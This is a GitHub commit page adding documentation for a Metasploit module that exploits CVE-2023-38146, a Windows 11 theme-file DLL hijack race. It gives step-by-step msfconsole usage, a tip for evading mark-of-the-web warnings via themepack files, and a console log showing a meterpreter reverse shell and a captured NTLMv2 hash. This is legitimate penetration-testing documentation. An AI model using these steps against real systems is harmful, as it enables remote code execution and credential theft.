Skip to content

Commit

Permalink
Add documentation
Browse files Browse the repository at this point in the history
  • Loading branch information
@bwatters-r7
bwatters-r7 committed Dec 21, 2023
1 parent 7fafab9 commit 78bac26
Showing 1 changed file with 121 additions and 0 deletions.
121 changes: 121 additions & 0 deletions ...mentation/modules/exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,121 @@
## Description

There exists a time of check to time of use vulnerability in the way Windows 11 loads msstyles files when they are
via a theme file. When a user opens a theme which references an msstyles file with a `PACKME_VERSION`
of 999, the process will check for the presence of the msstyles file appended with "_vrf.dll". If the file is found,
the process will open the file to check for a signature. If the signature is valid, the process closes the file and
then loads it. By closing the file after the check and before loading it, we can feed a legitimate signed dll to the
check read, and then substitute a malicious dll for the second, resulting in the process loading our dll and executing
arbitrary code.

To achieve this race condition, we implement a UNC path pointing back to an SMB server we control that uses the type
of request issued by the SMB client to decide to server the legitimate file or the payload file.

Because the PACKME_VERSION must be 999, this module includes a tool to take a normal windows aero.msstyles file
and populate it with the required PACKME_VERSION. As the aero.msstyles file is also a signed binary, we can use it
as both the msstyles file and the legitimate signed dll file.

As a final step, a user may convert the resultant theme file into a themepack file by using the linux command
`lcab exploit.theme exploit.themepack`
By converting this into a themepack file rather than a theme file, it circumvents the "mark of the web" and will no
longer result in a security warning dialog box before opening.

## Vulnerable Application

Windows 11

## Verification Steps

1. `./msfconsole`
2. `set payload windows/x64/meterpreter_reverse_tcp`
3. `set LHOST <IP>`
4. `set LPORT <PORT>`
5. `set STYLE_FILE` <PATH_TO_AERO_FILE>
6. `set DisablePayloadhandler false`
7. `run`
8. [OPTIONAL] Convert the theme file to a themepack file with the Linux command `lcab exploit.theme exploit.themepack`
9. Copy theme or themepack file over to target.

## Scenarios

### Windows 11

```
msf6 > use exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > show options
Module options (exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146):
Name Current Setting Required Description
---- --------------- -------- -----------
SHARE no Share (Default Random)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the loc
al machine or 0.0.0.0 to listen on all addresses.
SRVPORT 445 yes The local port to listen on.
STYLE_FILE yes The Microsoft-signed .msstyles file (e.g. aero.msstyles).
STYLE_FILE_NAME yes The name of the style file to reference.
THEME_FILE_NAME exploit.theme yes The name of the theme file to generate.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
View the full module info with the info, or info -d command.
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set SRVHOST 10.5.135.201
SRVHOST => 10.5.135.201
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set STYLE_FILE '/home/tmoose/rapid7/metasploit-framework/aero.msstyles'
STYLE_FILE => /home/tmoose/rapid7/metasploit-framework/aero.msstyles
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set STYLE_FILE_NAME aero
STYLE_FILE_NAME => aero
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set verbose true
verbose => true
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) >
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Server is running. Listening on 10.5.135.201:445
[*] Server started.
[+] exploit.theme stored at /home/tmoose/.msf4/local/exploit.theme
[*] Received SMB connection from 10.5.132.136
[SMB] NTLMv2-SSP Client : 10.5.132.136
[SMB] NTLMv2-SSP Username : .\msfuser
[SMB] NTLMv2-SSP Hash : msfuser::.:571cefb4150fb5f1:059699f9eee7e044d95167c03c58c6b4:010100000000000000326d46a633da013654631d1e8ef262000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080000326d46a633da0106000400020000000800300030000000000000000100000000200000fe746065d66cc1efc7756d546af110124dd7d6b60126a5edff7b41cce14019d90a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000
[*] Sending file to 10.5.132.136
[*] Sending stage (200774 bytes) to 10.5.132.136
[*] Server stopped.
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.136:50003) at 2023-12-20 18:40:25 -0600
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : DESKTOP-7M0LC28
OS : Windows 11 (10.0 Build 22000).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: DESKTOP-7M0LC28\msfuser
meterpreter >
```

0 comments on commit 78bac26

Please sign in to comment.